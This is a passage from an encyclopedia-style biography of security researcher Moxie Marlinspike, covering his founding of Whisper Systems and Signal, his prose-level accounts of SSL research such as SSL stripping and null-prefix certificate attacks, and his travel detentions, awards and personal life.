Marlinspike is a former head of the security team at
Twitter[7] and the author of a proposed SSL authentication system replacement called
Convergence.[8] He previously maintained a cloud-based
WPA cracking service[9] and a targeted anonymity service called GoogleSharing.[10]
Career
Marlinspike began his career working for several technology companies, including enterprise infrastructure software maker
BEA Systems Inc.[3][11]
In 2010, Marlinspike was the
chief technology officer and co-founder of
Whisper Systems,[12] an enterprise mobile security startup company. In May 2010, Whisper Systems launched
TextSecure and
RedPhone. These were applications that provided
end-to-end encrypted SMS messaging and voice calling, respectively. Twitter acquired the company for an undisclosed amount in late 2011.[13] The acquisition was done "primarily so that Mr. Marlinspike could help the then-startup improve its security".[11] During his time as Twitter's head of cybersecurity,[14] the firm made Whisper Systems' apps
open source.[15][16]
Marlinspike left Twitter in early 2013 and founded
Open Whisper Systems as a collaborative open source project for the continued development of TextSecure and RedPhone.[17][18][19] At the time, Marlinspike and Trevor Perrin started developing the
Signal Protocol, an early version of which was first introduced in the TextSecure app in February 2014.[20] In November 2015, Open Whisper Systems unified the TextSecure and RedPhone applications as
Signal.[21] Between 2014 and 2016, Marlinspike worked with
WhatsApp,
Facebook, and
Google to integrate the Signal Protocol into their messaging services.[22][23][24]
On February 21, 2018, Marlinspike and
WhatsApp co-founder
Brian Acton announced the formation of the
Signal Technology Foundation and its subsidiary, Signal Messenger LLC.[25][1] Marlinspike served as Signal Messenger's first CEO until stepping down on January 10, 2022.[26]
Research
SSL stripping
In a 2009 paper, Marlinspike introduced the concept of
SSL stripping, a
man-in-the-middle attack in which a network attacker could prevent a
web browser from upgrading to an SSL connection in a way that would likely go unnoticed by a user. He also announced the release of a tool, sslstrip, that would automatically perform these types of man-in-the-middle attacks.[27][28] The
HTTP Strict Transport Security (HSTS) specification was subsequently developed to combat these attacks.[29]
SSL implementation attacks
Marlinspike has discovered a number of different
vulnerabilities in popular SSL implementations. Notably, he published a 2002 paper on exploiting
SSL/TLS implementations that did not correctly verify the
X.509 v3 "BasicConstraints" extension in
public key certificate chains. This allowed anyone with a valid CA-signed certificate for any
domain name to create what appeared to be valid CA-signed certificates for any other domain. The vulnerable SSL/TLS implementations included the
Microsoft CryptoAPI, making
Internet Explorer and all other Windows software that relied on SSL/TLS connections vulnerable to a man-in-the-middle attack. In 2011, the same vulnerability was discovered to have remained in the SSL/TLS implementation on
Apple Inc.'s
iOS.[30][31] Also notably, Marlinspike presented a 2009 paper in which he introduced the concept of a null-prefix attack on SSL certificates. He revealed that all major SSL implementations failed to properly verify the Common Name value of a certificate, so that they could be tricked into accepting forged certificates by embedding
null characters into the CN field.[32][33]
In 2012, Marlinspike and
David Hulton presented research that makes it possible to reduce the security of
MS-CHAPv2 handshakes to a single
DES encryption. Hulton built hardware capable of cracking the remaining DES encryption in less than 24 hours, and the two made the hardware available for anyone to use as an Internet service.[39]
Mobily surveillance controversy
In 2013, Marlinspike published emails on his blog that he claimed were from Saudi Arabian telecom service Mobily soliciting his help in surveilling their customers, including intercepting communications running through various applications. Marlinspike refused to help, making the emails public instead. Mobily denied the allegations. "We never communicate with hackers", the company said.[40]
Traveling
Marlinspike says that when flying within the United States he is unable to print his own
boarding pass, is required to have airline ticketing agents make a phone call in order to issue one, and is subjected to
secondary screening at
TSA security checkpoints.[41]
While entering the U.S. on a flight from the Dominican Republic in 2010, Marlinspike was detained by federal agents for nearly five hours, all his electronic devices were confiscated, and at first agents claimed he would only get them back if he provided his passwords so they could decrypt the data. Marlinspike refused to do this, and the devices were eventually returned, though he noted that he could no longer trust them, saying, "They could have modified the hardware or installed new keyboard firmware."[42]
Recognition
In 2016, Fortune magazine named Marlinspike among its
40 under 40 for being the founder of Open Whisper Systems and "[encrypting] the communications of more than a billion people worldwide".[43]Wired also named him to its "Next List 2016," as one of "25 Geniuses Who Are Creating the Future of Business."[44]
In 2017, Marlinspike and Perrin were awarded the
Levchin Prize for Real World Cryptography "for the development and wide deployment of the Signal protocol".[45][46]
Personal life
Originally from the state of
Georgia,[3] Marlinspike moved to
San Francisco in the late 1990s at age 18.[1][11] The name Moxie Marlinspike is an assumed name partly derived from a childhood nickname.[1][3]
Marlinspike is a
sailing enthusiast and
master mariner.[3][47] In 2004, he bought a derelict sailboat and, with three friends, refurbished it and sailed around the
Bahamas while making a "
video zine" about their journey called Hold Fast.[1][3][11] He is also an
anarchist,[3] and several of his essays and speeches are published on the website The Anarchist Library, including "An Anarchist Critique of Democracy"[48] and "The Promise of Defeat."[49]
^Powers, Shawn M.; Jablonski, Michael (February 2015). The Real Cyber War: The Political Economy of Internet Freedom. University of Illinois Press. p. 198.
ISBN978-0-252-09710-2.
JSTOR10.5406/j.ctt130jtjf.
^Chris Aniszczyk (December 20, 2011).
"The Whispers Are True". The Twitter Developer Blog. Twitter. Archived from
the original on October 24, 2014. Retrieved January 22, 2015.